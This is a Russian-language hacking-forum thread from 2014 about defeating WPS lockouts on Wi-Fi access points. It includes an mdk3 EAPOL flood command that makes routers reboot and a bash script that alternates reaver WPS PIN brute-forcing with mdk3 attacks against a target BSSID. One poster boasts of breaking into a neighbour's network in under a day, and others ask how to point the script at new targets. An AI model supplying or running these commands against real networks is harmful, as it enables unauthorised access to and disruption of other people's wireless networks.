HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.09.2014, 12:49
СЕРЖ32
Познавший АНТИЧАТ
Регистрация: 01.09.2013
Сообщений: 1,761
Провел на форуме:
352373

Репутация: 0


По умолчанию

что то уже тема мёртвая ,видимо потому,что уже wps не актуален,уже у людей новые точки,где wps лочится навсегда,и никакой mdk3 не берёт,и ничего нового придумать не могут,что бы эти локи обойти.....

Вот тема и не развивается....
 
Ответить с цитированием

  #2  
Старый 03.09.2014, 12:54
ivantaan
Новичок
Регистрация: 17.11.2010
Сообщений: 7
Провел на форуме:
2155

Репутация: 0
По умолчанию

Друзья, есть новая уязвимость WPS у некоторых вендоров, она основана на низкой энтропии при генерации WPS кода на некоторых чипах BroadComm. (Грубо говоря, при каждой перезагрузке точки она генерирует один и тот же пин с большой вероятностью.) На августовской Black Hat 2014 конференции был продемонстрирован подбор WPS кода с 1-10 попыток на точках 2, пока мне неизвестных вендоров.

Вот презентация частично описывающия уязвимость:

http://www.engadget.com/2014/08/31/wifi-protected-setup-flaw/

У когото есть еще инфа?
 
Ответить с цитированием

  #3  
Старый 03.09.2014, 13:05
СЕРЖ32
Познавший АНТИЧАТ
Регистрация: 01.09.2013
Сообщений: 1,761
Провел на форуме:
352373

Репутация: 0


По умолчанию

а вот такое смотрели?http://www.youtube.com/watch?v=hHVPSJn4Fqo

Какой то новый способ,вроде как mdk3,но другой какой то...
 
Ответить с цитированием

  #4  
Старый 03.09.2014, 13:42
user100
Флудер
Регистрация: 24.12.2011
Сообщений: 4,497
Провел на форуме:
884729

Репутация: 373


По умолчанию

Цитата:
Сообщение от СЕРЖ32  

а вот такое смотрели?http://www.youtube.com/watch?v=hHVPSJn4Fqo

Какой то новый способ,вроде как mdk3,но другой какой то...

В примере показана EAPOL FLOOD ATTACK на точку доступа,

парень включил ее с нескольких режимов monitor mode (mon1, mon2...)

Сама атака:

mdk3 mon0 x 0 -t ff:ff:ff:ff:ff:ff -n "Essid AP" - s 50000

-t - указываем BSSID Точки доступа

-n - указываем Названи Точки доступа (ESSID)

-s - указываем колличество EAPOL пакетов в секунду (в примере их 50000)

В конце видео показано, что точка перезагружается и wps lock снимается.
 
Ответить с цитированием

  #5  
Старый 03.09.2014, 14:47
saimonyz
Member
Регистрация: 23.06.2012
Сообщений: 156
Провел на форуме:
57174

Репутация: 2
По умолчанию

Цитата:
Сообщение от user100  

В примере показана EAPOL FLOOD ATTACK на точку доступа,

парень включил ее с нескольких режимов monitor mode (mon1, mon2...)

Сама атака:

mdk3 mon0 x 0 -t ff:ff:ff:ff:ff:ff -n "Essid AP" - s 50000

-t - указываем BSSID Точки доступа

-n - указываем Названи Точки доступа (ESSID)

-s - указываем колличество EAPOL пакетов в секунду (в примере их 50000)

вообще можно юзать ReVdK3-r1.sh

Видео

https://www.youtube.com/watch?v=zf93xJ7xD2k#t=74

Скачать

http://www32.zippyshare.com/v/12811261/file.html

Почитать

https://forums.kali.org/showthread.php?19498-MDK3-Secret-Destruction-Mode

Есть ещё FrankenScript 2 , Atrophy
 
Ответить с цитированием

  #6  
Старый 03.09.2014, 16:03
chernec
Member
Регистрация: 07.10.2013
Сообщений: 57
Провел на форуме:
18619

Репутация: 0
По умолчанию

Цитата:

У меня он не заработал и я его переделал:

Код:
#!/bin/bash
while true;
# Run reaver to work 10 pin
echo
echo
echo [+] reaver is working ... 
do
reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -g 10 -s /etc/reaver/10FEED5AXXXX.wpc;

# Run mdk3 to work 3s 
echo
echo
echo [+] Mdk3 is working ... 
gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX";
sleep 3;
killall mdk3 2> /dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C];
sleep 14;
done;
и меньше чем за сутки взломал эту сеть!

sleep 3 - это сколько секунд шарашит mdk3

sleep 14 - пауза до появления точки в эфире

-g 10 - сколько пинов перебирать

Точка от меня через перекрытие и я поставил подбор на 10 пинов но если при подборе были ошибки то reaver зависал и надо было нажать ctrl+c.

Скорость перебора reaver была 2 пина в секунду + пауза + работа mdk3 + поиск точки reaverom по каналам = 48 - 50 секунд на 10 пинов.

Подскажите, на какой ОС лучше запускать скрипт, на wifislax не получилось, опишите пожалуйста
 
Ответить с цитированием

  #7  
Старый 03.09.2014, 16:10
TOX1C
Познавший АНТИЧАТ
Регистрация: 24.03.2012
Сообщений: 1,121
Провел на форуме:
418750

Репутация: 24


По умолчанию

Цитата:

Так а смысл такой атаки,что собственно натравливается на точку,что лок снимается?

Смысл в том, что роутер должен не справиться с наплывом желающих присосаться и отправиться в ребут. Тема та же, что и с навешиванием левых клиентов на точку, только работает иначе.

Цитата:

на какой ОС лучше запускать скрипт

На кали линукс заработало, но как бы без разницы, на чем его запускать, срабатывает он крайне редко.
 
Ответить с цитированием

  #8  
Старый 03.09.2014, 16:18
СЕРЖ32
Познавший АНТИЧАТ
Регистрация: 01.09.2013
Сообщений: 1,761
Провел на форуме:
352373

Репутация: 0


По умолчанию

Цитата:
Сообщение от TOX1C  

Смысл в том, что роутер должен не справиться с наплывом желающих присосаться и отправиться в ребут. Тема та же, что и с навешиванием левых клиентов на точку, только работает иначе.

На кали линукс заработало, но как бы без разницы, на чем его запускать, срабатывает он крайне редко.

Что то подсказывает,что современным роутерам,с новыми прошивками,такая атака тоже до одного места,как и mdk3 классический ,не будут они ребутится....

Та да....скрипт то включается.работает.только толку 0,ну или только если натравливать на старые роутеры,а так просто работает скрипт и всё,хоть на сутки включай работу mdk3
 
Ответить с цитированием

  #9  
Старый 03.09.2014, 18:08
4pips
Elder - Старейшина
Регистрация: 15.09.2013
Сообщений: 529
Провел на форуме:
124918

Репутация: 40
По умолчанию

Цитата:
Сообщение от chernec  

Подскажите, на какой ОС лучше запускать скрипт, на wifislax не получилось, опишите пожалуйста

В том сообщении (http://forum.antichat.ru/showpost.php?p=3760910&postcount=2082) первый скрипт для wifislax, а второй для Kali. Идея одна, но на разных ядрах реализация разная.
 
Ответить с цитированием

  #10  
Старый 03.09.2014, 18:45
saimonyz
Member
Регистрация: 23.06.2012
Сообщений: 156
Провел на форуме:
57174

Репутация: 2
По умолчанию

Цитата:
Сообщение от 4pips  

В том сообщении (http://forum.antichat.ru/showpost.php?p=3760910&postcount=2082) первый скрипт для wifislax, а второй для Kali. Идея одна, но на разных ядрах реализация разная.

там где /etc/reaver/6466B3ACXXXX.wpc нужно через редактор править на другую точку что мне надо просто не пойму как пользоваться этим скриптом
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.